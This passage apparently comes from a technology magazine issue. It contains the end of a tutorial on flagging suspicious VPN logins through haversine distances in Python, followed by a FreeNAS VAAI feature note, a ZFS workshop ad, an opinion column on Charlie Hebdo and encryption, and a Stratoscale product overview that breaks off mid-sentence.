            math.cos(math.radians(lat1)) \
            * math.cos(math.radians(lat2)) * math.sin(dlon/2) * \
            math.sin(dlon/2)
        c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
        d = radius * c
        return d


This is a little bit hard to explain without teaching you
math, so we will not be covering these details in this book.
The important thing for you to know about the code here
is the technique we are using, and that we know how to use
Google!
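
For readers who want to try the calculation on its own, the following sketch combines a haversine function with the "same user as the previous event?" check from the pseudocode. It is a simplified stand-in, not the script's code: events are plain (user, latitude, longitude) tuples, add_haversine() is a hypothetical helper, and the coordinates are taken from the sample output for user90. With a radius of 6371 km, the jump between the two locations should come out at roughly 4117 km.

```python
import math


def distance(origin, destination, radius=6371.0):
    """Haversine great-circle distance in km between two (lat, lon) pairs."""
    lat1, lon1 = origin
    lat2, lon2 = destination
    dlat = math.radians(lat2 - lat1)
    dlon = math.radians(lon2 - lon1)
    a = (math.sin(dlat / 2) ** 2
         + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2))
         * math.sin(dlon / 2) ** 2)
    return radius * 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))


def add_haversine(events):
    """Return one distance per event.

    `events` must already be sorted by user and then by time. The
    distance is measured from the same user's previous event, and is
    0.0 when the previous event belongs to someone else or is missing.
    """
    result = []
    for i, (user, lat, lon) in enumerate(events):
        if i > 0 and events[i - 1][0] == user:
            prev = events[i - 1]
            result.append(distance((prev[1], prev[2]), (lat, lon)))
        else:
            result.append(0.0)
    return result


events = [
    ('user90', 21.3209, -157.8389),
    ('user90', 34.0522003, -118.2437),
    ('user90', 21.3209, -157.8389),
    ('user91', 21.3209, -157.8389),
]
distances = add_haversine(events)
print([round(d, 1) for d in distances])
```

The first event of every user gets 0.0 simply because there is nothing to compare it with, which is why zero distances can be ignored during the review.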


timestamp      user    external         reason         geoip_cc  geoip_lat   geoip_lon  haversine
4/3/13 9:12    user1   67.53.40.236                    US        21.3209     -157.8389  0
4/3/13 9:15    user1   67.53.40.236     User Reques…   US        21.3209     -157.8389  0
4/3/13 9:47    user1   67.53.40.236                    US        21.3209     -157.8389  0
4/3/13 9:49    user1   67.53.40.236     User Reques…   US        21.3209     -157.8389  0
4/1/13 16:43   user2   72.234.151.233                  US        19.4601002  -155.0246  0
4/1/13 18:17   user2   72.234.151.233   User Reques…   US        19.4601002  -155.0246  0
4/1/13 20:49   user2   72.234.151.233                  US        19.4601002  -155.0246  0
4/1/13 22:46   user2   72.234.151.233   User Reques…   US        19.4601002  -155.0246  0
4/2/13 23:22   user3   75.85.132.182                   US        21.4701004  -157.9637  0
4/3/13 1:56    user3   75.85.132.182    DPD failure.   US        21.4701004  -157.9637  0
4/3/13 1:57    user3   75.85.132.182    DPD failure.   US        21.4701004  -157.9637  0
3/30/13 23:40  user4   50.113.7.155                    US        21.3421993  -157.8374  0
3/31/13 0:42   user4   50.113.7.155     User Reques…   US        21.3421993  -157.8374  0
4/1/13 10:40   user4   50.113.7.155                    US        21.3421993  -157.8374  0
4/1/13 12:27   user4   50.113.7.155     User Reques…   US        21.3421993  -157.8374  0
3/27/13 16:27  user5   12.226.166.178                  US        33.2229996  -117.1069  0
3/27/13 16:45  user5   12.226.166.178   User Reques…   US        33.2229996  -117.1069  0
3/28/13 18:43  user5   12.226.166.178                  US        33.2229996  -117.1069  0
3/28/13 19:26  user5   12.226.166.178   User Reques…   US        33.2229996  -117.1069  0
3/31/13 17:30  user5   12.226.166.178                  US        33.2229996  -117.1069  0
3/31/13 17:40  user5   12.226.166.178   User Reques…   US        33.2229996  -117.1069  0
3/27/13 16:03  user6   70.199.227.232                  US        45.5233994  -122.6762  0
3/28/13 10:39  user6   70.199.227.232   Transport cl…  US        45.5233994  -122.6762  0
3/28/13 14:08  user6   70.199.224.111                  US        45.5233994  -122.6762  0
3/28/13 16:20  user6   70.199.224.111   Transport cl…  US        45.5233994  -122.6762  0
4/3/13 9:09    user6   70.199.228.226                  US        45.5233994  -122.6762  0
3/27/13 22:21  user7   76.88.137.124                   US        21.3267002  -157.8167  0
3/28/13 1:08   user7   76.88.137.124                   US        21.3267002  -157.8167  0
3/28/13 2:23   user7   76.88.137.124    Transport cl…  US        21.3267002  -157.8167  0
3/28/13 22:16  user8   76.93.194.140                   US        21.3775005  -158.0862  0
3/28/13 22:46  user8   76.93.194.140    User Reques…   US        21.3775005  -158.0862  0
3/29/13 19:07  user8   24.43.224.194                   US        24.8598003  -168.0218  1086.93909
3/29/13 20:02  user8   24.43.224.194    DPD failure.   US        24.8598003  -168.0218  0
3/29/13 20:04  user8   24.43.224.194    DPD failure.   US        24.8598003  -168.0218  0
3/31/13 19:23  user8   76.93.194.140                   US        21.3775005  -158.0862  1086.93909
3/31/13 22:21  user8   76.93.194.140    Transport cl…  US        21.3775005  -158.0862  0
3/28/13 10:38  user9   98.150.159.172                  US        21.2982998  -157.7919  0
3/28/13 12:26  user9   98.150.159.172   User Reques…   US        21.2982998  -157.7919  0
3/29/13 8:56   user9   98.150.159.172                  US        21.2982998  -157.7919  0
3/29/13 13:41  user9   98.150.159.172   User Reques…   US        21.2982998  -157.7919  0
3/29/13 15:04  user9   98.150.159.172                  US        21.2982998  -157.7919  0


Figure 3. Sample output of the remote access script
In this case, a simple search for “Haversine Python”
would lead you to a ton of resources. We are crediting
Wayne Dyck for a piece of code made available on GitHub
for the haversine calculation. And, that is the code we will
be using! It is now time to run it and analyze the results.


ANALYZING THE RESULTS

To run the code, all you really need to do is type in the
following command:

    python analyze.py vpn.csv -o out.csv


When the program is run, it will do the following:


• Load the VPN log information from vpn.csv.
• Run the analytics we discussed in the previous section.
• Write the results to a file called out.csv.


Let us open up the out.csv file in a spreadsheet and look
at the results. The results should look similar to Figure 3.

The important information here is the last column, containing
the haversine distance. This should be the focus of
your review. We want to look for the larger haversine
distances because they mean that consecutive logins came
from locations that are farther apart. Therefore, the greater
the haversine distance, the more suspicious it is.


3/28/13 2:23   user7   76.88.137.124    Transport cl…  US        21.3267002  -157.8167  0
3/28/13 22:16  user8   76.93.194.140                   US        21.3775005  -158.0862  0
3/28/13 22:46  user8   76.93.194.140    User Reques…   US        21.3775005  -158.0862  0
3/29/13 19:07  user8   24.43.224.194                   US        24.8598003  -168.0218  1086.93909
3/29/13 20:02  user8   24.43.224.194    DPD failure.   US        24.8598003  -168.0218  0
3/29/13 20:04  user8   24.43.224.194    DPD failure.   US        24.8598003  -168.0218  0
3/31/13 19:23  user8   76.93.194.140                   US        21.3775005  -158.0862  1086.93909
3/31/13 22:21  user8   76.93.194.140    Transport cl…  US        21.3775005  -158.0862  0

Figure 4. Reviewing the access behavior of User8

4/1/13 22:15   user90  76.93.217.150    US        21.3267002  -157.8167   2.3884208
4/1/13 22:53   user90  76.93.217.150    US        21.3267002  -157.8167   0
4/2/13 11:26   user90  66.175.72.33     US        21.3209     -157.8389   2.3884208
4/2/13 12:10   user90  66.175.72.33     US        21.3209     -157.8389   0
4/2/13 13:05   user90  108.178.181.38   US        21.3136005  -157.80569  3.53389091
4/2/13 13:56   user90  108.178.181.38   US        21.3136005  -157.80569  0
4/2/13 15:48   user90  66.175.72.33               21.3209     -157.8389
4/2/13 16:06   user90  64.134.237.89              34.0522003  -118.2437
4/2/13 16:59   user90  66.175.72.33               21.3209     -157.8389
4/2/13 17:15   user90  64.134.237.89              34.0522003  -118.2437
4/3/13 9:17    user90  66.175.72.33               21.3209     -157.8389
4/3/13 10:42   user90  66.175.72.33     US        21.3209     -157.8389   0
4/3/13 12:33   user90  66.175.72.33     US        21.3209     -157.8389   0
4/3/13 13:28   user90  66.175.72.33     US        21.3209     -157.8389   0
4/3/13 14:05   user90  108.178.181.38   US        21.3136005  -157.80569  3.53389091

(Haversine values legible for the five highlighted rows from 4/2/13 15:48
to 4/3/13 9:17: 4117.41858, 4117.41858, 4117.41858.)

Figure 5. Reviewing the access behavior of User90

4/1/13 11:16   user91  66.175.72.33     US        21.3209     -157.8389   0
4/1/13 11:48   user91  66.175.72.33     US        21.3209     -157.8389   0
4/1/13 21:23   user91  72.235.23.189    US        21.3469009  -158.0183   18.804763
4/2/13 9:08    user91  72.235.23.189    US        21.3469009  -158.0183   0
4/2/13 9:09    user91  72.235.23.189    US        21.3469009  -158.0183   0
4/2/13 17:09   user91  72.235.23.189    US        21.3469009  -158.0183   0
4/3/13 6:29    user91  72.235.23.189    US        21.3469009  -158.0183   0
4/3/13 10:20   user91  198.23.71.73     US        32.9299011  -96.835297  6106.99523
4/3/13 10:20   user91  198.23.71.73     US        32.9299011  -96.835297  0
4/3/13 11:21   user91  198.23.71.73     US        32.9299011  -96.835297  0
4/3/13 13:45   user91  66.175.72.33               21.3209     -157.8389   6091.5666

Figure 6. Reviewing the access behavior of User91

Let us go through some examples to make it clearer. First
off, here are some quick guidelines for doing the review:


• Disregard haversine distances that are 0.

• Look for haversine distances that are large (e.g.,
  greater than 1000 km). The threshold is generally up to
  your discretion, but most of it is common sense. For
  example, let us look at “user8” (Figure 4):


User8 has a fairly large haversine distance. If you do
a GeoIP lookup, for example, using http://www.geoiptool.com,
it shows that the connections are coming from the
same state (Hawaii) but in different towns. You can also
see that the dates are one day apart, so it is not as
suspicious as it seems. But, based on your level of tolerance,
you can develop a policy to call and verify whether a user’s
login was valid for that day.
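
The first pass of this review is easy to automate. The sketch below is one possible way to do it, under the assumption that out.csv is a comma-separated file whose header matches the column names in Figure 3; the flag_rows() helper and the in-memory SAMPLE text are hypothetical, with the rows copied from the figures. The 1000 km cut-off is only the example value from the guidelines above.

```python
import csv
import io

THRESHOLD_KM = 1000.0  # example cut-off from the guidelines; adjust as needed

# Assumed layout: comma-separated, header named as in Figure 3.
SAMPLE = """timestamp,user,external,haversine
3/29/13 19:07,user8,24.43.224.194,1086.93909
3/29/13 20:02,user8,24.43.224.194,0
4/2/13 13:05,user90,108.178.181.38,3.53389091
"""


def flag_rows(handle, threshold=THRESHOLD_KM):
    """Return the rows whose haversine distance exceeds the threshold."""
    return [row for row in csv.DictReader(handle)
            if float(row['haversine']) > threshold]


flagged = flag_rows(io.StringIO(SAMPLE))
for row in flagged:
    print(row['timestamp'], row['user'], row['external'], row['haversine'])
```

To run it against a real results file, the io.StringIO object would be replaced by an open file handle. The flagged rows still need the human judgment described above, such as checking how far apart in time the two logins were.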


• Let us look for larger haversine distances in the list.
  You will see some that are fairly large, such as this
  one for “user90” (Figure 5).


There are several fairly large haversine distances here.
If you use a GeoIP locator, you will be able to piece
together the connection behavior of this user:


• 66.175.72.33 (Hawaii)
• 64.134.237.89 (California)
• 66.175.72.33 (Hawaii)
• 64.134.237.89 (California)


Note that this is in the span of one day. Actually, the first 
three logins were in the span of a couple of hours. This is 
obviously something worth investigating and, at the very 
least, having a security officer question user90 about 
these logins. Of course, this does not automatically mean 
that the connections are malicious. There could be valid 
reasons causing a user to connect through remote ma- 
chines. In any case, this is something worth investigating. 

Let us look at another one (Figure 6). This one has an even
bigger haversine distance. If we investigate this further, we
see this connection behavior in the span of one day:


• 72.235.23.189 (Hawaii)
• 198.23.71.73 (Texas)
• 198.23.71.73 (Texas)
• 198.23.71.73 (Texas)
• 66.175.72.33 (Hawaii)


As we already discussed, even though these connections
happened in a span of a few hours, this is not an absolute
indication of a malicious connection. Plausible reasons
for these types of connections include the following:


• The user is connecting through a remote machine.
• The user is using some sort of proxy or mobile service.
• Some users are sharing accounts.
• The account is compromised and a malicious user is
  connecting as the user.


In any of these scenarios, it is worthwhile to verify if 
these are valid connections. Ultimately, this type of re- 
view can be incorporated as a regular remote access re- 
view program, whereby the goal is to identify potentially 
malicious remote connections. Aside from checking for 
haversine distances, you could use the script as a foun- 
dation for creating other analysis methods to identify oth- 
er misuse of remote access connections. You could con- 
sider expanding your script by including the following: 


• concurrent connections by the same user,
• concurrent users,
• connections between two given times,
• connections from certain countries,
• more than x connections per day,
• users connecting at unusual times,
• users connecting from unusual locations,
• the frequency of connections, and many more.
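
As one example of such an extension, the sketch below counts connections per user per day and reports the pairs that exceed a limit. It is only an illustration: busy_days() is a hypothetical helper, the events are reduced to (user, datetime) tuples with timestamps taken from Figures 5 and 6, and it assumes the list contains connect events only.

```python
from collections import Counter
from datetime import datetime


def busy_days(events, limit):
    """Return {(user, date): count} for pairs with more than `limit` connections.

    `events` is an iterable of (user, datetime) tuples, one per connection.
    """
    counts = Counter((user, when.date()) for user, when in events)
    return {key: n for key, n in counts.items() if n > limit}


events = [
    ('user90', datetime(2013, 4, 2, 11, 26)),
    ('user90', datetime(2013, 4, 2, 13, 5)),
    ('user90', datetime(2013, 4, 2, 15, 48)),
    ('user91', datetime(2013, 4, 2, 9, 8)),
]
result = busy_days(events, limit=2)
print(result)
```

The same counting pattern could be keyed on country code or hour of day to cover several of the other ideas in the list.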


The principles discussed here can also be applied to
other data sets. For example, this technique can be
utilized for examining server or database access logs.
The scripts can also be easily tweaked to review physical
access logs, for example to identify physical access
to facilities at unusual times or frequencies.
FreeNAS 9.3 Features - Support for VMware VAAI


With all the excitement over the big changes introduced in FreeNAS 9.3 (including the
new update manager and the decision to completely move to ZFS), it’s easy to overlook
some of the other features that were added during the release. One of those
features we'd like to highlight was the added support for coherent VMware snapshots so ZFS
snapshots and VMware snapshots are properly coordinated.


iXsystems worked with FreeBSD developers to add additional VMware VAAI primitives to the
iSCSI protocol in FreeBSD. This feature was then brought over to FreeNAS and as a result,
FreeNAS 9.3 now fully supports the following VAAI block and thin provisioning primitives:


• Write Same Zero - Repetitive write operations are performed by FreeNAS

• Xcopy (Full Copy) - FreeNAS will mass copy blocks

• Atomic Test and Set - FreeNAS does not lock a full LUN, allowing other VMs on that LUN
  to run

• UNMAP - A thin provisioning API that ensures that FreeNAS never uses more space
  than needed

• Warn & Stun - Another thin provisioning operation that ensures that VMs don’t encounter
  an out-of-space condition or crash. You can address the out-of-space issue in FreeNAS
  and then restart affected VMs.


Also, FreeNAS tells VMware that it is thinly provisioned and will create ZFS snapshots to re- 
place the VMware snapshots. 


These features enable FreeNAS to integrate better with VMware deployments. These changes
will also be implemented in an upcoming TrueNAS release, making it easier for our customers
to use TrueNAS to back virtualization environments.


For more information about VAAI, check out the VMware site. 
Using FreeBSD as a File Server with ZFS


Ivan Voras 


The ZFS storage workshop will teach you how to create a ZFS file system from scratch and build a file server on top 
of it, but it will also teach you how ZFS, file systems and storage servers work in general. You will learn what ZFS 
looks like, its many features and quirks, and how to use it in a FreeBSD server as a building block of a small file 
server. 


ZFS is the ground-breaking file system originally developed at Sun Inc. for their Solaris operating system. It was 
open-sourced as a part of their OpenSolaris initiative and from there has spread to multiple other operating systems. 
FreeBSD was the first one to implement a working port, and though it has taken a fairly long time of tweaking and 
stabilization, it is now a robust and popular choice. There are products which successfully build upon the technolo- 
gies of FreeBSD and ZFS, such as FreeNAS and its related enterprise-class products from iXsystems, which au- 
tomate and simplify a lot of the tasks, but all of them use the same ZFS interface under the hood, which is not that 
complicated in itself. 


The requirements for this workshop are decent knowledge of FreeBSD, a basic familiarity with command-line
operations, and a system (possibly a virtual machine) on which the student will perform the required tasks, containing
at least four hard drives (physical or virtual). Since the topic of this workshop is file servers, the participants must
prepare a virtual or a physical machine with at least two disk drives (and preferably four), with which to perform the
exercises and the setup from the workshop.


http://osdmag.org/course/using-freebsd-as-a-file-server-with-zfs-2/ 


Ivan Voras is a FreeBSD developer and a long-time user, starting with FreeBSD 4.3 and throughout all the versions since.
In real life he is a researcher, system administrator and a developer, as opportunity presents itself, with a wide range of
experience from hardware hacking to cloud computing. He is currently employed at the University of Zagreb Faculty of
Electrical Engineering and Computing and lives in Zagreb, Croatia. You can follow him on his blog in English at
http://ivoras.net/blog or in Croatian at http://hrblog.ivoras.net/, as well as Google+ at https://plus.google.com/+IvanVoras.


Our courses are available online in Premium Membership. 
With the recent deaths from the Charlie
Hebdo terrorist attack in Paris, what
implications does this tragic event have
for freedom of speech, not only for print
journalists but for the Internet community
at large?


The events which occurred in January in Paris have
sent a visceral shock-wave through both secular
and religious communities in Europe quite unlike
anything since the terrorist atrocities in London and
Madrid of some years ago. While those attacks were horrific
enough, the Charlie Hebdo incident sank to new depths
in that the principle of freedom of expression itself was
directly targeted, inasmuch as innocent cartoonists and
editorial staff were murdered in cold blood in a major
European capital. These tactics are not new. The
Committee to Protect Journalists reports that 1110 journalists
have been killed while carrying out their work since 1992,
the majority being deliberately targeted and not killed due
to crossfire in war zones. What is new, however, is that
the fight, not just physically but ethically, has moved
from the protagonists’ territory to the West. This has
clearly been demonstrated in the reticence of certain
publications to carry the cartoons from Charlie Hebdo
for fear of causing further offense or potential reprisals,
while parroting the mantra “Of course we believe in
freedom of speech but ...”. I know that if I were a magazine
editor, I would find myself in a very difficult position.
Publish and be damned or take the diplomatic route of
appeasement? What is clear, though, is that all types of
media will need to perform a lot of soul-searching as to
how far they are willing to push the boundaries from now on.


The context surrounding Charlie Hebdo is quite unique
in many ways. Satire is a very powerful weapon and is an
ideal vehicle for puncturing inflated egos, exposing
blatant hypocrisy and shining a spotlight in the darker
corners of society where absurdities, injustice and inequality
hide. A cartoonist can achieve more in a few square
centimeters than most skilled authors can with an 8 point font.
While this is the bread and butter of Charlie Hebdo, the
magazine itself, not known for tact, subtlety or sensitivity,
hit out at every section of the establishment, both
political and religious, and not just Islam. Both Christians and
Jews have suffered the wrath of the French cartoonists’
pen. The magazine was born out of the publication Hara-Kiri
which, ironically for a secular society, was banned in 1970
after mocking the death of president Charles de Gaulle. The
tone has always been defiant and unequivocal. The phrase
“sacred cows make the best hamburgers” was made for them.


From this secular position, conflict was inevitable. France 
has always stood for intellectual freedom, the separation 
of Church and State being one of the cornerstones. The 
extremists that carried out this act held this moral position 
in such utter contempt that not only did they slaughter jour- 
nalists, but police and civilians as well. Any attempt to gain 
sympathy for their position or a fair hearing is now utterly 
eclipsed by the wickedness of their deed. It is no wonder 
that there has been an increase in tension, with all sides 
rushing to batten down the hatches in an increasing spiral 
of paranoia and division. As usual, it is the innocent that will 
suffer, and as always a small minority of troublemakers will 
capitalize, exploit and politicize this for their own agenda. 


Looking at this rationally, if I were to examine the odds,
the chances of being killed by a terrorist are probably one in
a few million. I have a better chance of being killed in a car
accident or suffering a fatal heart attack. The Charlie Hebdo
team knew the risks, and police protection was present.
Unlike the other victims who were killed, ultimately it
was their choice to take this particular editorial and ethical
stance. That is why this outrage is so poignant. Freedom
of speech is not cheap. Sometimes you will offend someone.
It takes guts to stand on your beliefs knowing you will
be criticised, pilloried or potentially killed.
So what has this got to do with Internet freedoms and
journalism? As predicted, knees have been spasmodically
jerking everywhere about the need to increase security:
more powers are needed, less freedom, etc. It is being
mooted that more legislation will be required to allow
agencies to decrypt encrypted traffic. This is bringing us
close to the position where encryption itself will be close
to worthless, as some unaccountable agency will be able
to intercept and decode “secure” communications, that
is if it is not being done already under the table. Any
criminal or terrorist worth his salt will know the importance of
encryption, so this begs the question: how many encrypted
communications are already being decrypted? All these
plots that the Intelligence services keep foiling cannot just
be based on surveillance; to start with, this is manpower
intensive and risky. Whistle-blowers or informers? Possibly.
But any strategist will tell you that, without the former,
signals intelligence is the most vital asset, but it comes
at a price. You need context, the big picture. As the old
saying goes, the intelligence services need to be lucky all
of the time, the terrorists only once. Ultimately, encryption
serves two purposes: to keep the bad guys out or to hide
something from the good guys. So while I can appreciate
the dilemma, and have every sympathy with the difficult
job the Intelligence services have to carry out, what
concerns me most is the old “If you’ve got nothing to
hide, you've got nothing to fear” argument. Or to put it
another way in Latin: Quis custodiet ipsos custodes? Who
watches the watchers? The argument goes back to Plato,
yet we still have not managed to find a satisfactory
resolution to this problem. Police states depend upon the
collusion of the populace, and when you add technology to the
mix you are heading towards dangerously thin ice. I do not
look forward to living in a society where opinions, beliefs or
even visiting certain websites makes me a potential
subversive. To some this will be a balanced and fair article,
to others I will be public enemy number 1. That is taken
as read. But if I am going to be judged, I'd like to know by
whom and by what criteria you are judging me.


As a society, have we not matured enough that books
or access to information don’t need to be locked away as
too dangerous for the masses? This is middle
ages, not 21st century, thinking. In this respect, encryption
has overplayed its hand: those now using encryption are
more “suspicious”. I see us getting to the point that you
will need to have a license and a very good reason to use
encryption (and of course you will have to hand the keys
over to your ISP or whoever). The potential for abuse by
those in a position to do so is enormous, especially when
the true risk of terrorism is so low. Of course, all of this
could change tomorrow and the West could be faced with an
onslaught, but surely the cause of all this bad blood is
rooted in years of poor foreign policy and injustice? Is it
not better to cure the problem rather than attempting to
patch the wound with a band aid? After all, human nature
being what it is, despite all our precautions, where there is
a will there is a way.


Sadly, I believe the juggernaut of the anti-privacy movement
is just going to carry on regardless. No doubt some
sort of technological or legal compromise will be reached,
but in essence the shift of power and control will move
once again in the direction of the establishment rather
than the individual. I may have nothing to hide, but in
today’s febrile political climate it is inevitable that we will
move more and more towards the dystopian model
predicted in Orwell's book, 1984. Technology is coming more
and more under the influence of those that wish to pervert
an idealistic vision of a better, more just and open society.


Attributed to the spirit of Voltaire, the phrase “I do not
agree with what you have to say, but I'll defend to the
death your right to say it” encapsulates the whole tragedy
in Paris that started on the morning of the 7th of January.
Unless, as a species, we learn to communicate with honest
words, integrity, humour (and dare I say it, with passion
and love) and maturely agree to disagree rather than using
violence, deceit, betrayal and duplicity, we face a race
to the bottom where history is repeated and hatred, division
and hegemony rule. As journalists, bloggers, social media
contributors and technologists, it is essential that we
carry on exposing the elephants in the room, challenging
taboos, bringing people together and raising the bar for
a better society, and a better world for all irrespective of
race, creed, colour, gender, religion or personal wealth.
More importantly, we need to pick our battles and decide the
level of personal risk we are willing to embrace. It is not
what you say, it is the way you say it and where that
matters. The pen might be mightier than the sword, but
technological innovation is mightier than the pen. Je suis Charlie.


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early 
teens. A keen advocate of open systems since the mid-eighties, he has 
worked in many corporate sectors including finance, automotive, air- 
lines, government and media in a variety of roles from technical sup- 
port, system administrator, developer, systems integrator and IT man- 
ager. He has moved on from CP/M and nixie tubes but keeps a solder- 
ing iron handy just in case. 
About Stratoscale

At Stratoscale, we're focused on how technology can be leveraged to help IT teams make better and more profitable usage of existing
infrastructures. We know that data needs are growing at an ever-increasing pace, so we've built a hardware-agnostic and
hyper-converged software solution that lowers the cost of scale-out and allows your IT infrastructure to keep up with business growth.


The Product 

Stratoscale is a hyper-converged operating system software that optimizes large data center operations. Stratoscale’s distributed 
software uses the rack as its design paradigm, in contrast to the traditional, single-server paradigm — creating a totally new founda- 
tion software stack. With system-learning algorithms that allow for increasingly smarter capacity planning and resource utilization, 
Stratoscale’s operating system software enables companies to maintain an infrastructure that maximizes efficiency and operational 
simplicity at scale. 


Stratoscale provides solutions for a variety of use cases and business problems across industries. 


Big Data 
Meeting the Needs of Growing Analytical Demands Requires 
a New Software and Hardware Approach. 


Today's mobile and cloud era involves an ever-growing num- 
ber of devices and connections to the Internet. This creates a 
new challenge for IT environments, which need to handle and 
process the masses of data being produced. 


The challenge is to leverage the large amount of structured,
semi-structured and unstructured data that is being generated,
especially in connection with e-commerce, social media
and the Internet of Things (IoT). The idea is that more data
should lead to more accurate analyses, leading to better
decisions and greater operational efficiencies.


However, most IT organizations are finding themselves faced with data sets that are too immense and complex to be processed us- 
ing most relational database management systems and desktop statistics and visualization packages. As the amount of data contin- 
ues to grow exponentially, organizations increasingly rely on solutions — such as Hadoop and Cassandra, which are built to handle 
immense data volumes — to present meaningful and actionable results. 


These emerging software analytics platforms often share one commonality: They rely on distributed and scale-out architectures. 


Unlike traditional data analytics solutions, these new frameworks perform parallel queries that run concurrently across tens, hun- 
dreds, or even thousands of servers. Successful implementations often hinge on mapping out the right strategy for deploying and 
managing the infrastructure necessary to support this new breed of analytics. 


A fully virtualized infrastructure can provide the agility needed to provision additional compute instances dynamically while also 
simultaneously allowing non-analytics workloads to run side by side. This negates the requirement to purchase and manage appli- 
cation-specific hardware. In addition, policy-based configuration practices provide the delivery of workloads in a matter of minutes, 
providing a new level of control over resource placement. 


With its innovative rack-scale architecture, Stratoscale provides the capabilities needed to confidently move ahead with any big data
initiatives. By optimizing the deployment and management of virtualized Hadoop installations, Stratoscale allows organizations to
get back to focusing on using big data insights to improve decision-making and increase productivity.

Hyper-Convergence
Time to Optimize Data Center Compute, Storage and Networking Resources.


Converged infrastructures typically combine siloed technolo- 
gies (such as storage and compute) into a single platform, cre- 
ating an opportunity to significantly reduce both CAPEX and 
OPEX costs. Maximizing this opportunity, however, should 
not come at the expense of workload performance or man- 
agement complexity. 


Integrating compute, storage and networking resources can 
reduce IT costs, improve efficiency and create a more agile en- 
vironment. 


Basic converged systems bring storage and virtualization 
technologies together on a single hardware platform. Man- 
agement applications are used to loosely bind the two en- 
vironments together for management and provisioning con- 
venience. Some costs are reduced by having virtualization 
and storage running on a single hardware platform (usually 
a dedicated appliance); however, there are still two disparate 
operating environments, and therefore the system is not truly 
converged or optimized. 


True Hyper-convergence 

A hyper-converged infrastructure dramatically reduces these “siloed technologies”, presenting all data center components in a
holistic manner. The platform acts as a single infrastructure that runs all workloads and applications. The servers, storage, networking
and even the virtualization stack are not only bundled together, but completely integrated and transparent to the administrator.


In a truly hyper-converged environment, rack-wide pools (or pools as wide as the data center) of compute, storage and networking 
resources are created on a single platform. Virtualized and containerized workloads are fully orchestrated and harmonized so that 
the problem of resource contention or interference is bypassed. A workload requiring heavy I/O won't impact adjacent workload 
performance. 


Stratoscale’s software creates an environment where the intended benefits of hyper-convergence can be realized. By allowing inte- 
grated technologies to be managed as a single, holistic system, the Stratoscale solution creates a self-optimizing infrastructure which 
automatically distributes workloads to run on the best matching hardware across the cluster, while constantly measuring and re- 
balancing workloads as required. When workload requirements change and rebalancing is needed, sub-second migration occurs, 
moving the workload to other, less busy nodes. 


Stratoscale’s all-software solution is built around the BYOH principle. “Bring your own hardware” allows organizations to seamlessly 
integrate existing compute, storage and networking hardware systems, allowing for unprecedented operational simplicity, scalabil- 
ity and time to value. 


DevOps vs. IT 


Creating a “DevOps”-Centric IT Culture and Infrastructure.


New application development paradigms create a significant challenge for IT: How does IT provide support for new infrastructure
requirements without impacting legacy workloads?

The DevOps paradigm is designed to create an agile, highly responsive environment for application development, testing, deployment
and operations. This “brave new world” moves traditional IT and application developers closer together, creating significant
opportunity for organizations to focus on creating a competitive advantage.


In a DevOps environment, application developers focus on
the code they write. A single application can be created and
wrapped in a container such as Docker and rapidly deployed
throughout the infrastructure, scaling to thousands of instances.
Orchestration tools communicate with the infrastructure,
assigning compute, storage and networking resources as
needed. The primary motivator for the developers is the
performance and scalability of the application that they wrote.


This approach is very different from the traditional IT view. Tra- 
ditionally, IT has been primarily concerned with the utilization of individual resources or silos. Server virtualization has been lever- 
aged to improve server utilization by running multiple virtual environments on a single server platform. Separate storage solutions 
deliver the data needed; and separate network technologies are used to connect everything together. While this approach has been 
somewhat effective in the past, the world of DevOps requires a much more agile, elastic and hyper-converged approach to the in- 
frastructure. 


In a DevOps environment: 


Infrastructure must instantly be able to handle any type of workload (virtualized or container-based). 

Provisioning of infrastructure must be automatic and happen in 1-2 seconds, as compared to today's manual processes involv- 
ing days or even weeks. 

Resource utilization must be monitored in real time with balancing taking place in a sub-second manner. 


Stratoscale has developed a rack-scale, hyper-converged software solution which delivers all of the requirements of a DevOps infra- 
structure environment. By supporting virtualized and containerized workloads, while converging compute, storage and networking 
resources, and orchestrating workload deployments utilizing sophisticated scheduling algorithms, we deliver a “run anything, store 
everything” environment that is ideally suited to DevOps. 


The Cloud and OpenStack™ 
OpenStack is Paving the Way for Private and Public Cloud 
Standardization. 


OpenStack is an open source software solution that provides
an Infrastructure-as-a-Service (IaaS) platform for private and
public cloud deployments. As cloud computing continues its
rise in the world of IT, OpenStack has become, arguably, the
leader and de facto standard in the open source community.
While still a relatively new technology, industry support for
OpenStack has been impressive and is creating opportunities
for new and existing vendors to market their software distributions,
appliances, public clouds and even consulting services.


With support from hundreds of companies from around the globe, the community of open source developers has shepherded
OpenStack to its current form. By leveraging other existing open source components, OpenStack’s core platform allows data centers
to pool together large compute (Nova), storage (Swift and Cinder) and networking (Neutron) resources into a single framework.
Additional services such as user and image management round out a suite of software services that enable data centers to be
DevOps-friendly and function as a self-service cloud-computing infrastructure.


An open source alternative to more traditional systems, OpenStack has piqued the curiosity of those tied to legacy and proprietary 
solutions. The promise of high levels of customization, which are sometimes necessary to more closely match business needs, is ex- 
tremely appealing and avoids the dreaded vendor lock-in. In addition, the collaborative nature of open source projects means indi- 
vidual companies don't have to carry the full burden and costs of development by themselves. Most important, however, is Open- 
Stack’s potential for drastically cutting data center expenses — including licensing costs for virtualization and ongoing maintenance. 


But perhaps the biggest benefit OpenStack has brought to the industry is the unofficial standardization of core cloud computing 
interfaces. By rallying support across software and hardware industries, OpenStack is now the de-facto API standard for private and 
public clouds (alongside AWS). This level of abstraction is vital to the health of the project's ecosystem, allowing partners to provide 
value-added differentiation while guaranteeing interoperability with other vendors. 


With hundreds of corporations, service providers and global data centers currently considering OpenStack solutions, the real ques- 
tion may be how to successfully leverage OpenStack in order to maximize the efficiency of the data center. 


Stratoscale takes the guesswork out of deploying OpenStack clouds of all sizes. 


Stratoscale is a hardware-agnostic software stack that is 100% compatible with OpenStack. By converging compute, storage and 
networking into resource pools available across the rack or data center, Stratoscale’s self-optimizing infrastructure automatically dis- 
tributes all physical and virtual assets and workloads in real time, delivering rack-scale economics to data centers of all sizes with un- 
paralleled efficiency and operational simplicity. 


Virtual Machines vs. Containers 
Two virtualization technologies headed for a crossroads in a fight 
for dominance in the data center. 


Today, nearly all IT organizations have come to realize the value
and cost savings afforded by virtualization technology. The premise
is simple: Consolidate multiple applications running on individual
(and oftentimes underutilized) servers onto a single server,
thus reaping tremendous hardware savings and cutting other
operational expenses.


The technology, while extremely complex, is now readily available from both commercial vendors and open source solutions like 
